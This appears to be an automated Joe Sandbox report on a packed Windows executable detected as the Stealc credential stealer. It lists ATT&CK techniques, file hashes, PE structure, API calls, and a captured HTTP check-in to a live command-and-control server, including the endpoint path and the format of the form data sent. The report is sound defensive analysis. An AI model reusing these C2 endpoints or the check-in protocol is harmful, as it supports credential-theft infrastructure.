Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	334 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://docs.rs/getrandom#nodejs-es-module-support	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/6c4adf523b719729.php	true		unknown
http://185.215.113.206/	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/405117-2476756634-1003ge	file.exe, 00000000.00000002.2091636092.00000000015C2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/6c4adf523b719729.php/	file.exe, 00000000.00000002.2091636092.00000000015DF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/d?	file.exe, 00000000.00000002.2091636092.00000000015DF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206	file.exe, 00000000.00000002.2091636092.000000000157E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.206/6c4adf523b719729.phpeC	file.exe, 00000000.00000002.2091636092.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/6c4adf523b719729.phpAC	file.exe, 00000000.00000002.2091636092.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.206/$	file.exe, 00000000.00000002.2091636092.00000000015DF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://docs.rs/getrandom#nodejs-es-module-support	file.exe, file.exe, 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2037496917.00000000051BB000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.206	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545915
Start date and time:	2024-10-31 10:14:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 80% Number of executed functions: 19 Number of non-executed functions: 130
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.206	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206/6c4adf523b719729.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.960375228766626
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'123'776 bytes
MD5:	6b2b5a158403acb7ba15c52a59282cab
SHA1:	dae583617b2057015ff1c7ada6d9bf6c0e262481
SHA256:	f7bbc837510990dd6831eb9ab92b7fe5d9238f105ea9690bdf5808dc0e5cfbbf
SHA512:	fffe76065d3cb74adbd293dbdb3d7d8fc1d5e71a9c9fc220e60e1fc4b30aae38143688b672e03135dd2ba6b2957ebf9ada09c90a5848fdba19b6fcd7f51c8f49
SSDEEP:	49152:NU05Qc6VelxdRoEb5lzQwkxua1vIPcWDs1oMkbMCc0N3:tUsxTzzQVJT+sXkbv9N
TLSH:	2BA533D3FD6075FDFA6E4E3E71949712AE56A9A81048F025BB4E9CBF844354389083E3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xb24000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FBF091C46FAh
cmovbe esp, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e9050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2e91f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x2e7000	0x67600	dc7ad9f42f116b6f2bc8180deabe2ef8	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2e8000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x2e9000	0x1000	0x200	049071433b9f7c843453337b0fd53002	False	0.1328125	data	0.8946074494647072	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x2ea000	0x29d000	0x200	811d44b77f35e5a33f353de9bdfa7d55	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nrgnjalz	0x587000	0x19c000	0x19b800	fbc237ed7251ff89378b802ae91da1f9	False	0.9948620709295262	data	7.95429774987272	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wpavutyr	0x723000	0x1000	0x400	e41c6116c5b37e14b8fd15b3bc561e93	False	0.7373046875	data	5.934453510243722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x724000	0x3000	0x2200	a978644d070edaef5c6659ed5090b540	False	0.058363970588235295	DOS executable (COM)	0.6022537531291793	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-31T10:15:02.495046+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49704	185.215.113.206	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 10:15:01.277966022 CET	49704	80	192.168.2.5	185.215.113.206
Oct 31, 2024 10:15:01.283076048 CET	80	49704	185.215.113.206	192.168.2.5
Oct 31, 2024 10:15:01.283169031 CET	49704	80	192.168.2.5	185.215.113.206
Oct 31, 2024 10:15:01.283346891 CET	49704	80	192.168.2.5	185.215.113.206
Oct 31, 2024 10:15:01.288217068 CET	80	49704	185.215.113.206	192.168.2.5
Oct 31, 2024 10:15:02.190222025 CET	80	49704	185.215.113.206	192.168.2.5
Oct 31, 2024 10:15:02.190279007 CET	49704	80	192.168.2.5	185.215.113.206
Oct 31, 2024 10:15:02.209681988 CET	49704	80	192.168.2.5	185.215.113.206
Oct 31, 2024 10:15:02.214565039 CET	80	49704	185.215.113.206	192.168.2.5
Oct 31, 2024 10:15:02.494920969 CET	80	49704	185.215.113.206	192.168.2.5
Oct 31, 2024 10:15:02.495045900 CET	49704	80	192.168.2.5	185.215.113.206
Oct 31, 2024 10:15:05.830221891 CET	49704	80	192.168.2.5	185.215.113.206

HTTP Request Dependency Graph

185.215.113.206

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.206	80	5952	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:15:01.283346891 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Oct 31, 2024 10:15:02.190222025 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:15:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 31, 2024 10:15:02.209681988 CET	413	OUT	POST /6c4adf523b719729.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJ Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 32 38 46 36 46 35 32 36 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 2d 2d 0d 0a Data Ascii: ------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="hwid"A428F6F526363848468766------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="build"tale------JKKEHJDHJKFIECAAKFIJ--
Oct 31, 2024 10:15:02.494920969 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 09:15:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Target ID:	0
Start time:	05:14:56
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xcd0000
File size:	2'123'776 bytes
MD5 hash:	6B2B5A158403ACB7BA15C52A59282CAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2037496917.0000000005190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2091636092.000000000157E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.5%
Total number of Nodes:	1327
Total number of Limit Nodes:	24

Executed Functions

Function 00CE9BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,015907C8), ref: 00CE9BF1
GetProcAddress.KERNEL32(75900000,015907E0), ref: 00CE9C0A
GetProcAddress.KERNEL32(75900000,01590810), ref: 00CE9C22
GetProcAddress.KERNEL32(75900000,01590840), ref: 00CE9C3A
GetProcAddress.KERNEL32(75900000,01590828), ref: 00CE9C53
GetProcAddress.KERNEL32(75900000,01598AB0), ref: 00CE9C6B
GetProcAddress.KERNEL32(75900000,01586680), ref: 00CE9C83
GetProcAddress.KERNEL32(75900000,01586740), ref: 00CE9C9C
GetProcAddress.KERNEL32(75900000,01590588), ref: 00CE9CB4
GetProcAddress.KERNEL32(75900000,015905B8), ref: 00CE9CCC
GetProcAddress.KERNEL32(75900000,015905D0), ref: 00CE9CE5
GetProcAddress.KERNEL32(75900000,01590630), ref: 00CE9CFD
GetProcAddress.KERNEL32(75900000,01586980), ref: 00CE9D15
GetProcAddress.KERNEL32(75900000,01590648), ref: 00CE9D2E
GetProcAddress.KERNEL32(75900000,01590678), ref: 00CE9D46
GetProcAddress.KERNEL32(75900000,015866E0), ref: 00CE9D5E
GetProcAddress.KERNEL32(75900000,015906A8), ref: 00CE9D77
GetProcAddress.KERNEL32(75900000,015908A0), ref: 00CE9D8F
GetProcAddress.KERNEL32(75900000,01586860), ref: 00CE9DA7
GetProcAddress.KERNEL32(75900000,01590888), ref: 00CE9DC0
GetProcAddress.KERNEL32(75900000,01586800), ref: 00CE9DD8
LoadLibraryA.KERNEL32(015908B8,?,00CE6CA0), ref: 00CE9DEA
LoadLibraryA.KERNEL32(015908D0,?,00CE6CA0), ref: 00CE9DFB
LoadLibraryA.KERNEL32(015908E8,?,00CE6CA0), ref: 00CE9E0D
LoadLibraryA.KERNEL32(01590900,?,00CE6CA0), ref: 00CE9E1F
LoadLibraryA.KERNEL32(01590918,?,00CE6CA0), ref: 00CE9E30
GetProcAddress.KERNEL32(75070000,01590858), ref: 00CE9E52
GetProcAddress.KERNEL32(75FD0000,01590870), ref: 00CE9E73
GetProcAddress.KERNEL32(75FD0000,01598DC0), ref: 00CE9E8B
GetProcAddress.KERNEL32(75A50000,01598C28), ref: 00CE9EAD
GetProcAddress.KERNEL32(74E50000,01586760), ref: 00CE9ECE
GetProcAddress.KERNEL32(76E80000,01598B20), ref: 00CE9EEF
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00CE9F06

Strings

NtQueryInformationProcess, xrefs: 00CE9EFA

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: b4cec95f221f3992710886e7294e8b3a291623e1b126e5e4752473b727b72cc9
Instruction ID: ff72dc35e21e12bbf61480c54a5e8e61d2f4d9637a0a013e848c451e7b2ce3ed
Opcode Fuzzy Hash: b4cec95f221f3992710886e7294e8b3a291623e1b126e5e4752473b727b72cc9
Instruction Fuzzy Hash: EBA1FEF66183089FC344EFA9EC88E667BF9A78F701714861AB909C3270D7349941EF60

Function 00CD4610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 00CD465F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00CD47EC

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD46BD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4707
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD47AA
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4672
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4784
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4728
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD467D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD479F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD47C0
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4693
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD47B5
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4688
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD46C8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4779
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD46D3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD46FC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD471D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4667
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD478F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD47CB
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4712
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD476E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD46B2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD46A7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00CD4763

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
